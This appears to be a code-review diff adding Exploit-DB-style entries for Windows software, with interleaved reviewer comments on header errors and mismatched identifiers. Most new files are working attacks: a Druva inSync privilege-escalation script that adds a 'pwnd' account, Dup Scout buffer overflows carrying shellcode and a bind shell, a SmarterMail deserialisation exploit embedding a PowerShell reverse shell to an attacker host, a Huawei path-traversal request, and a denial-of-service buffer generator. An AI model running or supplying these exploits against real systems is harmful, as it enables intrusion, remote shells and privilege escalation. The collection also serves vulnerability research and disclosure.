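Review bot: The Python block at the end of the file hides every failure behind a bare `except:` and prints "Archive no ready" without the reason. It also leaves the handle open if `write()` raises, and it shadows the name `file`. I would write it as `with open("Mikon.txt", "w") as fh: fh.write(buffer)` and catch `except OSError as exc:` so the error can be printed. The same block appears in exploits/windows/dos/49207.txt with "Paimon.txt". The header `# Date: 2020-05-12` also looks like a day/month swap given the neighbouring December 2020 entries, though that is an inference.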
diff --git a/exploits/windows/dos/49207.txt b/exploits/windows/dos/49207.txt
new file mode 100644
index 000000000..927ff39a9
--- /dev/null
+++ b/exploits/windows/dos/49207.txt
@@ -0,0 +1,29 @@
+# Exploit Title: RarmaRadio 2.72.5 - Denial of Service (PoC)
+# Date: 2020-05-12
+# Exploit Author: Ismael Nava
+# Vendor Homepage: http://www.raimersoft.com/
+# Software Link: https://www.raimersoft.com/rarmaradio.html
+# Version: 2.75.5
+# Tested on: Windows 10 Home x64
+# CVE : n/a
+
+#STEPS
+# Open the program TapinRadio 
+# In Edit select Settings option
+# Click in Network
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Paimon.txt"
+# Paste the content in the field Username, Address and Server and click in OK
+# End :)
+
+
+buffer = 'K' * 20000
+
+try: 
+    file = open("Paimon.txt","w")
+    file.write(buffer)
+    file.close()
+
+    print("Archive ready")
+except:
+    print("Archive no ready")
\ No newline at end of file
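Review bot: The header contradicts itself on what is affected: the title says RarmaRadio 2.72.5, `# Version:` says 2.75.5, and the first step reads `# Open the program TapinRadio`, which is the product of the preceding entry. Anyone triaging exposure from this entry cannot tell which product build was actually tested. The step should read `# Open the program RarmaRadio`, and the title and `# Version:` line should carry the same number.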
diff --git a/exploits/windows/local/49015.txt b/exploits/windows/local/49015.txt
new file mode 100644
index 000000000..32951e2e5
--- /dev/null
+++ b/exploits/windows/local/49015.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Realtek Audio Service 1.0.0.55 - 'RtkAudioService64.exe' Unquoted Service Path
+# Discovery by: Erika Figueroa
+# Discovery Date: 2020-11-07
+# Vendor Homepage: https://www.realtek.com/en/
+# Tested Version: 1.0.0.55
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 8.1 x64 es
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i /v """
+
+Realtek Audio Service                                                   RtkAudioService                     C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe            Auto
+# Service info:
+
+C:\>sc qc "RtkAudioService"
+[[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: RtkAudioService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
+        GRUPO_ORDEN_CARGA  : PlugPlay
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Realtek Audio Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
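Review bot: The discovery command filters on `findstr /i "CodeMeter"`, which cannot have produced the `RtkAudioService` row printed beneath it; the filter looks copied from another advisory and should name the service actually reported (49158.txt in this commit has the same leftover filter). The `sc qc` output also opens with a doubled bracket, `[[SC]`. The `#Exploit:` paragraph leaves out the precondition that decides real impact: an unquoted `C:\Program Files\...` path only matters where a non-administrative user can create a file in a parent directory of that path, which default ACLs on current Windows versions normally prevent, so the entry should record the permissions found on the tested host. A remediation line is missing as well: enclosing the service's binary path in quotes in its configuration removes the ambiguity. The same missing precondition and remediation apply to 49158.txt, 49203.txt, 49205.txt and 49226.txt in this commit.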
diff --git a/exploits/windows/local/49158.txt b/exploits/windows/local/49158.txt
new file mode 100644
index 000000000..8d2780566
--- /dev/null
+++ b/exploits/windows/local/49158.txt
@@ -0,0 +1,41 @@
+# Exploit Title: Realtek Andrea RT Filters 1.0.64.7 - 'AERTSr64.EXE' Unquoted Service Path
+# Discovery by: manuel Alvarez
+# Discovery Date: 2020-11-07
+# Vendor Homepage:  https://www.realtek.com/en/
+# Tested Version: 1.0.64.7
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 x64 es
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i
+"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i
+/v """
+
+Andrea RT Filters Service
+AERTFilters                         C:\Program Files\IDT\WDM\AESTSr64.exe
+             Auto
+
+# Service info:
+
+C:\Users\ComoDVD>sc qc AESTFilters
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: AESTFilters
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\AESTSr64.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Andrea ST Filters Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert
+their code in the system root path undetected by the OS or other security
+applications where it could potentially be executed during application
+startup or reboot. If successful, the local user's code would execute with
+the elevated privileges of the application.
\ No newline at end of file
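Review bot: The identifiers in this entry do not agree with one another, so a reader cannot tell which service was tested. The title names Realtek and `AERTSr64.EXE`, and the wmic row shows service `AERTFilters` with display name `Andrea RT Filters Service`, but `sc qc` is run against `AESTFilters`, reports `Andrea ST Filters Service`, and both outputs give the binary as `C:\Program Files\IDT\WDM\AESTSr64.exe`. The title and the wmic row may have been transcribed from the neighbouring Realtek entry (49014 in files_exploits.csv); they should be aligned with the `sc qc` output, or the capture redone. The vendor link and the "Tested Version" should then be re-checked against the product that actually owns that path.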
diff --git a/exploits/windows/local/49203.txt b/exploits/windows/local/49203.txt
new file mode 100644
index 000000000..53d0928a3
--- /dev/null
+++ b/exploits/windows/local/49203.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path
+# Date: 2020-9-3
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://rumble.sf.net/
+# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
+# Version: Version 0.51.3135
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+
+# Service info:
+
+C:\Users\m507>sc qc "RumbleService"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: RumbleService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Rumble\rumble_win32.exe --service
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Rumble Mail Server
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
diff --git a/exploits/windows/local/49205.txt b/exploits/windows/local/49205.txt
new file mode 100644
index 000000000..69f50d3c0
--- /dev/null
+++ b/exploits/windows/local/49205.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path
+# Discovery by: Ismael Nava
+# Discovery Date: 05-12-2020
+# Vendor Homepage: https://www.kite.com/
+# Software Links : https://www.kite.com/download/
+# Tested Version: 1.2020.1119.0
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
+KiteService	KiteService	C:\Program Files\Kite\KiteService.exe	Auto
+
+
+C:\>sc qc "KiteService"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: KiteService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 0   IGNORE
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Kite\KiteService.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : KiteService
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/49211.ps1 b/exploits/windows/local/49211.ps1
new file mode 100644
index 000000000..13589ac59
--- /dev/null
+++ b/exploits/windows/local/49211.ps1
@@ -0,0 +1,32 @@
+# Exploit Title: Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)
+# Date: 2020-12-03
+# Exploit Author: 1F98D
+# Original Author: Matteo Malvica
+# Vendor Homepage: druva.com
+# Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.6.3/inSync6.6.3r102156.msi
+# Version: 6.6.3
+# Tested on: Windows 10 (x64)
+# CVE: CVE-2020-5752
+# References: https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/
+# Druva inSync exposes an RPC service which is vulnerable to a command injection attack.
+
+$ErrorActionPreference = "Stop"
+
+$cmd = "net user pwnd /add"
+
+$s = New-Object System.Net.Sockets.Socket(
+    [System.Net.Sockets.AddressFamily]::InterNetwork,
+    [System.Net.Sockets.SocketType]::Stream,
+    [System.Net.Sockets.ProtocolType]::Tcp
+)
+$s.Connect("127.0.0.1", 6064)
+
+$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
+$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
+$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
+$length = [System.BitConverter]::GetBytes($command.Length);
+
+$s.Send($header)
+$s.Send($rpcType)
+$s.Send($length)
+$s.Send($command)
\ No newline at end of file
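Review bot: The header calls the flaw "a command injection attack", but the `$command` line depends on a `..\..\..\` traversal out of `C:\ProgramData\Druva\inSync4\`, which matches the path-traversal write-up in the `# References:` line; the comment should describe it that way. I would add above `$command` something like `# The service appears to accept only paths that begin with its ProgramData directory; the traversal leaves that directory`, hedged because the service's check is not shown here. The header gives only the tested version; a `# Fixed in: <FIXED_VERSION>` line taken from the vendor advisory would let a reader decide whether a host is still exposed. It should also state that the script as written leaves a local account named `pwnd` behind, so that test machines are cleaned up afterwards.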
diff --git a/exploits/windows/local/49226.txt b/exploits/windows/local/49226.txt
new file mode 100644
index 000000000..089479935
--- /dev/null
+++ b/exploits/windows/local/49226.txt
@@ -0,0 +1,37 @@
+# Exploit Title: PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path
+# Discovery by: Zaira Alquicira
+# Discovery Date: 2020-12-10
+# Vendor Homepage:  https://pdf-complete.informer.com/3.5/
+# Tested Version: 3.5.310.2002
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i
+"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "pdfsvc" | findstr /i /v
+"""
+
+PDF Complete
+
+PDF Complete  C:\Program Files (x86)\PDF Complete\pdfsvc.exe
+/startedbyscm:66B66708-40E2BE4D-pdfcService
+Auto
+
+
+# Service info:
+
+C:\Users\TOSHIBA>sc qc "pdfcDispatcher"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: pdfcDispatcher
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\PDF Complete\pdfsvc.exe
+/startedbyscm:66B66708-40E2BE4D-pdfcService
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : PDF Document Manager
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
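Review bot: The two command outputs describe the service under different names: the wmic row prints `PDF Complete` for both name and display name, while `sc qc` is run against `pdfcDispatcher` and reports the display name `PDF Document Manager`. Either the wmic output was edited or the wrong row was pasted; the entry should show the unedited row for `pdfcDispatcher`. The hard line wraps also split the binary path from its `/startedbyscm:...` argument in both outputs, which makes it look as if the argument were a separate field; each should be kept on one line.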
diff --git a/exploits/windows/remote/46697.py b/exploits/windows/remote/46697.py
index 7c881a738..3b65609ac 100755
--- a/exploits/windows/remote/46697.py
+++ b/exploits/windows/remote/46697.py
@@ -71,6 +71,8 @@ def SendString(string,ip):
     for char in string:
         target = socket(AF_INET, SOCK_DGRAM)
         target.sendto(characters[char],(ip,1978))
+        sleep(0.5)
+
     
 
 
diff --git a/exploits/windows/remote/49210.py b/exploits/windows/remote/49210.py
new file mode 100755
index 000000000..809e75ea0
--- /dev/null
+++ b/exploits/windows/remote/49210.py
@@ -0,0 +1,63 @@
+# Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow
+# Requires web service to be enabled.
+# Tested on Windows 10 Pro (x64)
+# Based on: https://www.exploit-db.com/exploits/43145 and https://www.exploit-db.com/exploits/40457
+# Credits: Tulpa and SICKNESS for original exploits
+# Modified: @0rbz_
+
+import socket,os,time,struct,argparse,sys
+
+parser = argparse.ArgumentParser()
+parser.add_argument('--host', required=True)
+args = parser.parse_args()
+
+host = args.host
+port = 80
+
+# msfvenom --platform windows -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f py
+
+buf =  ""
+buf += "\xb8\xa0\xa1\xfd\x38\xd9\xf7\xd9\x74\x24\xf4\x5a\x31"
+buf += "\xc9\xb1\x31\x31\x42\x13\x83\xc2\x04\x03\x42\xaf\x43"
+buf += "\x08\xc4\x47\x01\xf3\x35\x97\x66\x7d\xd0\xa6\xa6\x19"
+buf += "\x90\x98\x16\x69\xf4\x14\xdc\x3f\xed\xaf\x90\x97\x02"
+buf += "\x18\x1e\xce\x2d\x99\x33\x32\x2f\x19\x4e\x67\x8f\x20"
+buf += "\x81\x7a\xce\x65\xfc\x77\x82\x3e\x8a\x2a\x33\x4b\xc6"
+buf += "\xf6\xb8\x07\xc6\x7e\x5c\xdf\xe9\xaf\xf3\x54\xb0\x6f"
+buf += "\xf5\xb9\xc8\x39\xed\xde\xf5\xf0\x86\x14\x81\x02\x4f"
+buf += "\x65\x6a\xa8\xae\x4a\x99\xb0\xf7\x6c\x42\xc7\x01\x8f"
+buf += "\xff\xd0\xd5\xf2\xdb\x55\xce\x54\xaf\xce\x2a\x65\x7c"
+buf += "\x88\xb9\x69\xc9\xde\xe6\x6d\xcc\x33\x9d\x89\x45\xb2"
+buf += "\x72\x18\x1d\x91\x56\x41\xc5\xb8\xcf\x2f\xa8\xc5\x10"
+buf += "\x90\x15\x60\x5a\x3c\x41\x19\x01\x2a\x94\xaf\x3f\x18"
+buf += "\x96\xaf\x3f\x0c\xff\x9e\xb4\xc3\x78\x1f\x1f\xa0\x77"
+buf += "\x55\x02\x80\x1f\x30\xd6\x91\x7d\xc3\x0c\xd5\x7b\x40"
+buf += "\xa5\xa5\x7f\x58\xcc\xa0\xc4\xde\x3c\xd8\x55\x8b\x42"
+buf += "\x4f\x55\x9e\x20\x0e\xc5\x42\x89\xb5\x6d\xe0\xd5"
+
+buffer = "\x41" * 260
+buffer += struct.pack("<L", 0x10090c83) # JMP ESP - libspp
+buffer += "\x90" * 20
+buffer += buf
+buffer += "\x90" * (10000 - len(buffer))
+
+evil =  "POST /online_registration HTTP/1.1\r\n"
+evil += "Host: " + sys.argv[2] +"\r\n"
+evil += "User-Agent: Mozilla/5.0\r\n"
+evil += "Connection: close\r\n"
+evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+evil += "Accept-Language: en-us,en;q=0.5\r\n"
+evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
+evil += "Keep-Alive: 300\r\n"
+evil += "Proxy-Connection: keep-alive\r\n"
+evil += "Content-Type: application/x-www-form-urlencoded\r\n"
+evil += "Content-Length: 17000\r\n\r\n"
+evil += "customer_name=" + buffer
+evil += "&unlock_key=" + buffer + "\r\n"
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect((host,port))
+print 'Sending evil buffer...'
+s.send(evil)
+print 'Payload Sent!'
+s.close()
\ No newline at end of file
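Review bot: This file has none of the header fields the other entries in this commit carry (`# Exploit Title:`, `# Date:`, `# Vendor Homepage:`, `# Version:`, `# CVE:`), so the affected version appears only in the free-text first line. It also does not say that it is Python 2 only, which the `print 'Sending evil buffer...'` statements require; a `# Requires: Python 2` line would save readers a syntax error. The comment `# JMP ESP - libspp` hard-codes an address inside a bundled module, which implies that module loads at a fixed base; 49217.py in this commit states as much for `libspp.dll`. Recording that here tells a defender which mitigation is absent on the vendor side. A `# Fixed in: <FIXED_VERSION>` line, if a fix exists, would complete the header.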
diff --git a/exploits/windows/remote/49216.py b/exploits/windows/remote/49216.py
new file mode 100755
index 000000000..7f4d494fb
--- /dev/null
+++ b/exploits/windows/remote/49216.py
@@ -0,0 +1,56 @@
+# Exploit Title: SmarterMail Build 6985 - Remote Code Execution
+# Exploit Author: 1F98D
+# Original Author: Soroush Dalili
+# Date: 10 May 2020
+# Vendor Hompage: re
+# CVE: CVE-2019-7214
+# Tested on: Windows 10 x64
+# References:
+# https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/
+# 
+# SmarterMail before build 6985 provides a .NET remoting endpoint
+# which is vulnerable to a .NET deserialisation attack.
+#
+#!/usr/bin/python3
+​
+import base64
+import socket
+import sys
+from struct import pack
+​
+HOST='192.168.1.1'
+PORT=17001
+LHOST='192.168.1.2'
+LPORT=4444
+​
+psh_shell = '$client = New-Object System.Net.Sockets.TCPClient("'+LHOST+'",'+str(LPORT)+');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 =$sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
+psh_shell = psh_shell.encode('utf-16')[2:] # remove BOM
+psh_shell = base64.b64encode(psh_shell)
+psh_shell = psh_shell.ljust(1360, b' ')
+​
+payload = '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'
+payload = base64.b64decode(payload)
+payload = payload.replace(bytes("X"*1360, 'utf-8'), psh_shell)
+​
+uri = bytes('tcp://{}:{}/Servers'.format(HOST, str(PORT)), 'utf-8')
+​
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((HOST,PORT)) 
+​
+msg = bytes()
+msg += b'.NET'                 # Header
+msg += b'\x01'                 # Version Major
+msg += b'\x00'                 # Version Minor
+msg += b'\x00\x00'             # Operation Type
+msg += b'\x00\x00'             # Content Distribution
+msg += pack('I', len(payload)) # Data Length
+msg += b'\x04\x00'             # URI Header
+msg += b'\x01'                 # Data Type
+msg += b'\x01'                 # Encoding - UTF8
+msg += pack('I', len(uri))     # URI Length
+msg += uri                     # URI
+msg += b'\x00\x00'             # Terminating Header
+msg += payload                 # Data
+​
+s.send(msg)
+s.close()
\ No newline at end of file
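Review bot: The title says "SmarterMail Build 6985" while the description says builds before 6985 expose the vulnerable endpoint, so the title (and the matching files_exploits.csv row) appears to name the first fixed build rather than an affected one; `SmarterMail < Build 6985` would agree with the comment, to be confirmed against the referenced NCC Group advisory. `# Vendor Hompage: re` is misspelled and its value is truncated; it should read `# Vendor Homepage: <VENDOR_URL>`. The `#!/usr/bin/python3` line comes after the comment header, so it is an ordinary comment and not a shebang. Since the script targets `PORT=17001`, the header could add a mitigation note for readers who cannot upgrade at once: that port should not be reachable from untrusted networks.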
diff --git a/exploits/windows/remote/49217.py b/exploits/windows/remote/49217.py
new file mode 100755
index 000000000..176d16be5
--- /dev/null
+++ b/exploits/windows/remote/49217.py
@@ -0,0 +1,70 @@
+# Exploit Title: Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)
+# Date: 2020-12-08
+# Exploit Author: Andrés Roldán
+# Vendor Homepage: http://www.dupscout.com
+# Software Link: http://www.dupscout.com/downloads.html
+# Version: 10.0.18
+# Tested on: Windows 10 Pro x64
+
+#!/usr/bin/env python3
+
+import socket
+import struct
+
+HOST = '127.0.0.1'
+PORT = 80
+
+# msfvenom --platform windows --arch x86 -p windows/shell_bind_tcp -b "\x00\0x9\x0a\x0d\x20" -f python -v SHELL
+SHELL =  b""
+SHELL += b"\x29\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e"
+SHELL += b"\x81\x76\x0e\xfa\xfa\xc4\x90\x83\xee\xfc\xe2\xf4"
+SHELL += b"\x06\x12\x46\x90\xfa\xfa\xa4\x19\x1f\xcb\x04\xf4"
+SHELL += b"\x71\xaa\xf4\x1b\xa8\xf6\x4f\xc2\xee\x71\xb6\xb8"
+SHELL += b"\xf5\x4d\x8e\xb6\xcb\x05\x68\xac\x9b\x86\xc6\xbc"
+SHELL += b"\xda\x3b\x0b\x9d\xfb\x3d\x26\x62\xa8\xad\x4f\xc2"
+SHELL += b"\xea\x71\x8e\xac\x71\xb6\xd5\xe8\x19\xb2\xc5\x41"
+SHELL += b"\xab\x71\x9d\xb0\xfb\x29\x4f\xd9\xe2\x19\xfe\xd9"
+SHELL += b"\x71\xce\x4f\x91\x2c\xcb\x3b\x3c\x3b\x35\xc9\x91"
+SHELL += b"\x3d\xc2\x24\xe5\x0c\xf9\xb9\x68\xc1\x87\xe0\xe5"
+SHELL += b"\x1e\xa2\x4f\xc8\xde\xfb\x17\xf6\x71\xf6\x8f\x1b"
+SHELL += b"\xa2\xe6\xc5\x43\x71\xfe\x4f\x91\x2a\x73\x80\xb4"
+SHELL += b"\xde\xa1\x9f\xf1\xa3\xa0\x95\x6f\x1a\xa5\x9b\xca"
+SHELL += b"\x71\xe8\x2f\x1d\xa7\x92\xf7\xa2\xfa\xfa\xac\xe7"
+SHELL += b"\x89\xc8\x9b\xc4\x92\xb6\xb3\xb6\xfd\x05\x11\x28"
+SHELL += b"\x6a\xfb\xc4\x90\xd3\x3e\x90\xc0\x92\xd3\x44\xfb"
+SHELL += b"\xfa\x05\x11\xfa\xf2\xa3\x94\x72\x07\xba\x94\xd0"
+SHELL += b"\xaa\x92\x2e\x9f\x25\x1a\x3b\x45\x6d\x92\xc6\x90"
+SHELL += b"\xeb\xa6\x4d\x76\x90\xea\x92\xc7\x92\x38\x1f\xa7"
+SHELL += b"\x9d\x05\x11\xc7\x92\x4d\x2d\xa8\x05\x05\x11\xc7"
+SHELL += b"\x92\x8e\x28\xab\x1b\x05\x11\xc7\x6d\x92\xb1\xfe"
+SHELL += b"\xb7\x9b\x3b\x45\x92\x99\xa9\xf4\xfa\x73\x27\xc7"
+SHELL += b"\xad\xad\xf5\x66\x90\xe8\x9d\xc6\x18\x07\xa2\x57"
+SHELL += b"\xbe\xde\xf8\x91\xfb\x77\x80\xb4\xea\x3c\xc4\xd4"
+SHELL += b"\xae\xaa\x92\xc6\xac\xbc\x92\xde\xac\xac\x97\xc6"
+SHELL += b"\x92\x83\x08\xaf\x7c\x05\x11\x19\x1a\xb4\x92\xd6"
+SHELL += b"\x05\xca\xac\x98\x7d\xe7\xa4\x6f\x2f\x41\x34\x25"
+SHELL += b"\x58\xac\xac\x36\x6f\x47\x59\x6f\x2f\xc6\xc2\xec"
+SHELL += b"\xf0\x7a\x3f\x70\x8f\xff\x7f\xd7\xe9\x88\xab\xfa"
+SHELL += b"\xfa\xa9\x3b\x45"
+
+PAYLOAD = (
+    b'\x90' * (2482 - len(SHELL)) +
+    SHELL +
+    b'\xeb\x10\x90\x90' +
+    # 0x1002071c: add esp,8 # ret 0x04 at libspp.dll (ASLR: False, Rebase: False, SafeSEH: False)
+    struct.pack('<L', 0x1002071c) +
+    b'\x90' * 32  +
+    b'\xE9\x4D\xF6\xFF\xFF' +
+    b'C' * (10000 - 2482 - 4 - 32 - len(SHELL))
+)
+
+HTTP_PAYLOAD = (
+    b'GET /settings&sid=' + PAYLOAD + b' HTTP/1.1\r\n' +
+    b'Host: ' + HOST.encode() +
+    b'\r\n\r\n'
+)
+
+with socket.create_connection((HOST, PORT)) as fd:
+    print('[+] Sending payload...')
+    fd.sendall(HTTP_PAYLOAD)
+    print('[+] Done. Check for a shell on port 4444.')
\ No newline at end of file
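Review bot: `#!/usr/bin/env python3` sits on the ninth line of the file, after the header comments, so it has no effect; it belongs on line 1 or should be removed. The header does not repeat the precondition that 49210.py states for the same product version (`# Requires web service to be enabled.`); if it applies here too, saying so tells a defender that disabling the web interface removes the exposure. The inline comment already records that `libspp.dll` is built with `ASLR: False, Rebase: False, SafeSEH: False`; that is the most useful fact in the file for a vendor or defender and deserves a line in the header, not only a mention inside the `PAYLOAD` expression.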
diff --git a/exploits/windows/remote/49218.txt b/exploits/windows/remote/49218.txt
new file mode 100644
index 000000000..ad386c027
--- /dev/null
+++ b/exploits/windows/remote/49218.txt
@@ -0,0 +1,303 @@
+# Exploit Title: Huawei HedEx Lite 200R006C00SPC005 - Path Traversal
+# Date: 2020-11-24
+# Exploit Author: Vulnerability-Lab
+# Vendor Homepage: https://www.huawei.com/
+# Software Link: https://support.huawei.com/carrier/docview!docview?nid=SCL1000005027&path=PAN-ET/PAN-T/PAN-T-HedEx
+# Version: 200R006C00SPC005
+
+Document Title:
+===============
+Huawei HedEx Lite (DM) - Path Traversal Web Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2268
+
+
+Release Date:
+=============
+2020-11-24
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2268
+
+
+Common Vulnerability Scoring System:
+====================================
+7
+
+
+Vulnerability Class:
+====================
+Directory- or Path-Traversal
+
+
+Current Estimated Price:
+========================
+3.000€ - 4.000€
+
+
+Product & Service Introduction:
+===============================
+https://support.huawei.com/carrier/docview!docview?nid=SCL1000005027&path=PAN-ET/PAN-T/PAN-T-HedEx
+
+
+Abstract Advisory Information:
+==============================
+A vulnerability laboratory core team researcher discovered a path
+traversal vulnerability in the Huawei HedEx Lite v200R006C00SPC005.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-11-24: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Restricted Authentication (User Privileges)
+
+
+User Interaction:
+=================
+No User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+An exploitable path traversal vulnerability has been discovered in the
+official Huawei HedEx Lite v200R006C00SPC005.
+Attackers can able to request local files or resources by remote
+requesting to unauthorized change a local path.
+
+
+Proof of Concept (PoC):
+=======================
+The path traversal vulnerability can be exploited by remote attackers
+with restricted system user privileges wihtout user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+Vulnerable File(s):
+./newOtherManageContent.cgi [URL Path Filename]
+./newStartupHedExBeeAction.cgi [URL Path Filename]
+./newprehomeadvsearch.cgi [URL Path Filename]
+
+
+--- PoC Session Logs [POST Method Request] ---
+URL:
+http://localhost:7890/newOtherManageContent.cgi/................................windowswin.ini
+Path:
+/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
+HTTP/1.1
+Host: localhost:7890
+User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101
+Firefox/27.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Referer: http://localhost:7890/newindex.cgi
+Connection: close
+Content-Length: 0
+
+
+ --- PoC Session Logs [Response] ---
+HTTP/1.1 200 OK
+Content-Disposition: attachment; filename="win.ini"
+Content-Length: 1801
+Content-Type: application/octet-stream;charset=utf-8
+X-Frame-Options: SAMEORIGIN
+-
+; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1
+CMCDLLNAME32=mapi32.dll
+CMC=1
+MAPIX=1
+MAPIXVER=1.0.0.1
+OLEMessaging=1
+[MCI Extensions.BAK]
+3g2=MPEGVideo
+3gp=MPEGVideo
+3gp2=MPEGVideo
+3gpp=MPEGVideo
+aac=MPEGVideo
+adt=MPEGVideo
+adts=MPEGVideo
+m2t=MPEGVideo
+m2ts=MPEGVideo
+m2v=MPEGVideo
+m4a=MPEGVideo
+m4v=MPEGVideo
+mod=MPEGVideo
+mov=MPEGVideo
+mp4=MPEGVideo
+mp4v=MPEGVideo
+mts=MPEGVideo
+ts=MPEGVideo
+tts=MPEGVideo
+[Drivers.32]
+OLEMessaging.64=$80,$5D,$D9,$A6,$A4,$18,$A8,$AD
+[ChannelDownmixer]
+p1.bIsMultichannel=0
+p1.wFormatTag=1
